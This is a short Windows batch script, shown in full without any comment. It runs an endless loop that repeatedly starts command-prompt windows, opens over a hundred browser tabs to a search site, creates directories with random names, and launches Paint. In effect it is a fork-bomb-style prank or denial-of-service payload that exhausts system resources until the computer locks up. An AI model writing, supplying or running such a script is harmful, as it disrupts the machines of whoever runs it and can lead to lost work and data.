@echo off
:a
start cmd
start cmd
start cmd
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
start www.google.com
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
Md %random%
start mspaint
goto a